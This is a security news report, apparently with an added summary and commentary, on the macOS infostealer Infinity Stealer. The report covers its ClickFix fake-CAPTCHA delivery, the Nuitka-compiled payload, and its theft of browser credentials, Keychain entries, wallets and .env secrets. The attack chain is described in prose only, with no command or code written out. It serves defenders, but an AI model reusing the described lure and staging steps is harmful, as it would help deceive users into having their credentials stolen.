A new info-stealing malware named Infinity Stealer is targeting macOS systems with a Python payload packaged as an executable using the open-source Nuitka compiler.
The attack uses the ClickFix technique, presenting a fake CAPTCHA that mimics Cloudflare’s human verification check to trick users into executing malicious code.
Researchers at Malwarebytes say this is the first documented macOS campaign combining ClickFix delivery with a Python-based infostealer compiled using Nuitka.
Because Nuitka produces a native binary by compiling the Python script into C code, the resulting executable is more resistant to static analysis.
Compared to PyInstaller, which bundles Python with bytecode, it’s more evasive because it produces a real native binary with no obvious bytecode layer, making reverse engineering much harder.
“The final payload is written in Python and compiled with Nuitka, producing a native macOS binary. That makes it harder to analyze and detect than typical Python-based malware,” Malwarebystes says.
Attack chain
The attack begins with a ClickFix lure on the domain update-check[.]com, posing as a human verification step from Cloudflare and asking the user to complete the challenge by pasting a base64-obfuscated curl command into the macOS Terminal, bypassing OS-level defenses.
The command decodes a Bash script that writes the stage-2 (Nuitka loader) to /tmp, then removes the quarantine flag, and executes it via ‘nohup.’ Finally, it passes the command-and-control (C2) and token via environment variables and then deletes itself and closes the Terminal window.
The Nuitka loader is an 8.6 MB Mach-O binary that contains a 35MB zstd-compressed archive, containing the stage-3 (UpdateHelper.bin), which is the Infinity Stealer malware.
Before starting to collect sensitive data, the malware performs anti-analysis checks to determine whether it is running in a virtualized/sandboxed environment.
Malwarebytes’ analysis of the Python 3.11 payload uncovered that the info-stealer can take screenshots and harvest the following data:
- Credentials from Chromium‑based browsers and Firefox
- macOS Keychain entries
- Cryptocurrency wallets
- Plaintext secrets in developer files, such as .env
All stolen data is exfiltrated via HTTP POST requests to the C2, and a Telegram notification is sent to the threat actors upon completion of the operation.
Malwarebytes underlines that the appearance of malware like Infinity Stealer is proof that threats to macOS users are only getting more advanced and targeted.
Users should never paste into Terminal commands they find online and don’t fully understand.
Automated Pentesting Covers Only 1 of 6 Surfaces.
Automated pentesting proves the path exists. BAS proves whether your controls stop it. Most teams run one without the other.
This whitepaper maps six validation surfaces, shows where coverage ends, and provides practitioners with three diagnostic questions for any tool evaluation.
Post a Comment Community Rules
You need to login in order to post a comment
Not a member yet? Register Now
Facts Only
A new macOS malware named Infinity Stealer is targeting users with a Python payload compiled using the Nuitka compiler.
The malware uses the ClickFix technique, presenting a fake Cloudflare CAPTCHA to trick users into executing malicious code.
Malwarebytes researchers identified this as the first documented macOS campaign combining ClickFix delivery with a Python-based infostealer compiled via Nuitka.
The attack begins with a base64-obfuscated curl command on the domain update-check[.]com, posing as a Cloudflare human verification step.
The command decodes a Bash script that writes a Nuitka loader to /tmp, removes the quarantine flag, and executes it via ‘nohup.’
The Nuitka loader is an 8.6 MB Mach-O binary containing a 35MB zstd-compressed archive with the final payload, UpdateHelper.bin.
The malware performs anti-analysis checks before collecting data, including browser credentials, macOS Keychain entries, cryptocurrency wallets, and plaintext secrets.
Stolen data is exfiltrated via HTTP POST requests to a command-and-control server, with a Telegram notification sent to attackers.
Malwarebytes warns that macOS threats are becoming more advanced and targeted.
Users are advised never to paste untrusted commands into Terminal.
Executive Summary
Full Take
The Infinity Stealer campaign represents a significant escalation in macOS malware sophistication, blending social engineering with advanced technical evasion. The use of ClickFix—a fake CAPTCHA—exploits user trust in familiar verification processes, while the Nuitka compiler’s native binary output complicates detection and analysis. This dual approach underscores a broader trend: attackers are increasingly combining psychological manipulation with technical obfuscation to bypass defenses. The malware’s focus on cryptocurrency wallets and developer secrets suggests a targeted effort to exploit high-value assets, aligning with the growing professionalization of cybercrime.
**Steelman:** The strongest aspect of this narrative is its clear documentation of a novel attack vector. By detailing the technical chain—from ClickFix lure to Nuitka compilation—it provides actionable intelligence for defenders. The warning against blindly pasting Terminal commands is a critical reminder of user agency in security.
**Pattern Scan:** The attack leverages *ARC-0012 Trust Exploitation* (abusing familiarity with Cloudflare’s CAPTCHA) and *ARC-0034 Technical Obfuscation* (Nuitka’s native binary to evade analysis). The base64-obfuscated command and self-deleting script also align with *ARC-0041 Evasion Tactics*.
**Root Cause:** The paradigm here is the assumption that macOS users are inherently safer than Windows users—a myth that attackers are actively dismantling. The unstated assumption is that users will comply with social engineering prompts without scrutiny, a vulnerability exacerbated by the normalization of CAPTCHAs.
**Implications:** For human agency, this highlights the tension between convenience and security. Users face a cognitive burden: verifying every Terminal command is impractical, yet blind trust is exploitable. The second-order consequence is a potential erosion of trust in legitimate verification systems, as attackers weaponize their ubiquity.
**Bridge Questions:** How might defenders adapt to malware that blends social engineering with advanced compilation techniques? What role should platform vendors play in mitigating risks from tools like Nuitka, which have legitimate uses but are weaponized here? Would stricter Terminal warnings reduce efficacy without alienating users?
**Counterstrike Scan:** A coordinated influence campaign would amplify fear of macOS vulnerabilities while downplaying mitigation strategies (e.g., "macOS is now as unsafe as Windows"). The actual content avoids this, focusing on technical details and user education—a healthy alignment with defensive goals.
Sentinel — Human
The text appears to be written by a human. While there are some indications of variable sentence length and coherence suggesting AI involvement, the overall structure, emphasis, and voice indicate human authorship.